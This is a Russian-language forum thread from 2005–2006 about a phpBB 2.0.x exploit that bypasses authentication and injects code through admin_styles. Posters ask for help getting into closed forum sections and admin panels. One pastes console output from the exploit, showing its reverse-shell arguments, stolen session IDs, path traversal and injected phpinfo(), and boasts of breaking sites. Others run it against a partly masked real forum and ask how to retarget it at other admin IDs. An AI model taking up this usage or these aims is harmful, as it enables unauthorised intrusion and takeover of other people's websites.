Народ, читайте не последнее собщение темы, а всю тему!
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
|
10.06.2005 02:14:22
|
|
|
|
|
|
21.06.2005 02:08:02
пацаны помагите надо срочно попасть на форум в закрытый раздел по адрессу кто может помочь очень надо и срочно
|
|
|
|
|
|
23.06.2005 20:49:02
А вот у меня нифига не выводит при запуске... Кто-ниб знает что делать в таком случае?
|
|
|
|
|
|
30.06.2005 18:14:40
да сплойт однозначно рулит!
только чет нарудо понабежало много странного! |
|
|
|
|
|
30.06.2005 18:17:30
|
|||
|
|
|
|
08.07.2005 23:43:51
у мя ролик есть как правильно эту штуку юзать [IMG][/IMG]
|
|
|
|
|
|
09.07.2005 13:02:56
вот как я делал
Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\Admin gt;d: D:\ gt;phpbb phpbbexp.exe [backshell ip] [backshell port] coded by Malloc(0) Wicked Attitude phpbb lt;= 2.0.12 uid vuln + admin_styles.php exploit D:\ gt;phpbb.exe 1 1 _ nom du #099;ookie recuperer : phpbb2mysql _ SESSION ID recuperщ ... 4c5275deb1c0c1651efe70d9c44c8ec6 _ recuperation du nom de la table sql ... phpbb_ OK _ Injection de la fake templates ...OK _ Fichier crщe _ Code executщ insta ll_to=../../../../.. /../../../../../../../../../../../../../../tmp nigga=phpinfo (); sid=4c5275deb1c0 c1651efe70d9c44c8ec6 D:\ gt; ну вот. а в итоге получается, что, заходя на этот сайт я вижу phpBB : Критическая ошибка Could not query database for theme info DEBUG MODE SQL Error : 1146 Table 15ru771.phpbb_themes doesnt exist .:. Любые попытки взлома форума преследуются по закону .:. Сервис форумов .:. Платный хостинг .:. Знакомства и по этой замудреной ссылке тож самое получается, я их только ломаю |
|
|
|
|
|
04.09.2005 19:29:04
Не могу скомплить!! какието ошибки при компиляции с помощью lcc-win32. Есть у кого нить уже exe файл?
Заранее благодарен! |
|
|
|
|
|
07.09.2005 03:44:57
:help:
*путь* phpbbexp.exe http://****.h14.ru/forum/ 1 1 _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperщ ... fbe9b024977071b64891488e3ac248a6 http://****.h14.ru/forum/?sid=fbe9b024977071b64891488e3ac248a6 _ recuperation du nom de la table sql ... can't find Что не так? Почему "_ recuperation du nom de la table sql ... can't find" ?????  |
|
|
|
|
|
07.11.2005 05:46:17
Здравствуйте Всееее!
Почитал.... 1. как юзать - это вижуль хак на 2) в этом вижуль , во время работы говориться , что обязательно надо убить все куки перед использованием (иначе будет глючить ...................) Всем спасибо ,удачи 2000beta :funny:  |
|
|
|
|
|
10.11.2005 13:02:42
помогите попасть в админку phpBB 2.0.8!!! :help:
|
|
|
|
|
|
07.12.2005 16:39:47
Если я правильно понял, данный эксплоит расчитан на форумы, где админский user_id=2. И при этом успешно работает, я проверял!
Вопрос к спецам: что именно нужно изменить в эксплойте, чтобы подменить куки админа с user_id=NN? Дело в том, что есть форумы, где user_id=2 имеют рядовые пользователи. |
|
|
|
|
|
12.12.2005 14:49:10
userid легко угадывается в тексте сплойта, вопрос в другом: если я поменял userid, где взять компилятор?
:help: |
|
|
|
|
|
18.04.2006 20:01:48
как узнать какой префикс используется в бд?
|
|
|
|
|
|
24.07.2006 21:10:12
Народ!
Купил неткатовскую версию е-коммерс - это типа интернет-магазин. кто может настроить за деньги выгрузку прайса из 1С обещанную производителем в три уровня, и поиск не тупой, который на страницу прайса отсылает, а не товар показывает и еще чтоб фотки товара были. Месяц маюсь и начинал со стандарта! Есть спецы по неткату кроме рекламных? ЛОХХ igor@artcraft.ru |
|
|
|
|
|
13.11.2006 01:02:21
блин киньте ссылку на сплоит кто нибудь плиз...
на этой не находит ошибка 404 |
|
|
|
|
|
16.11.2006 22:00:03
 ЯкОоо Многоь миь харесваь |
||||
|
|
|
|||
Читают тему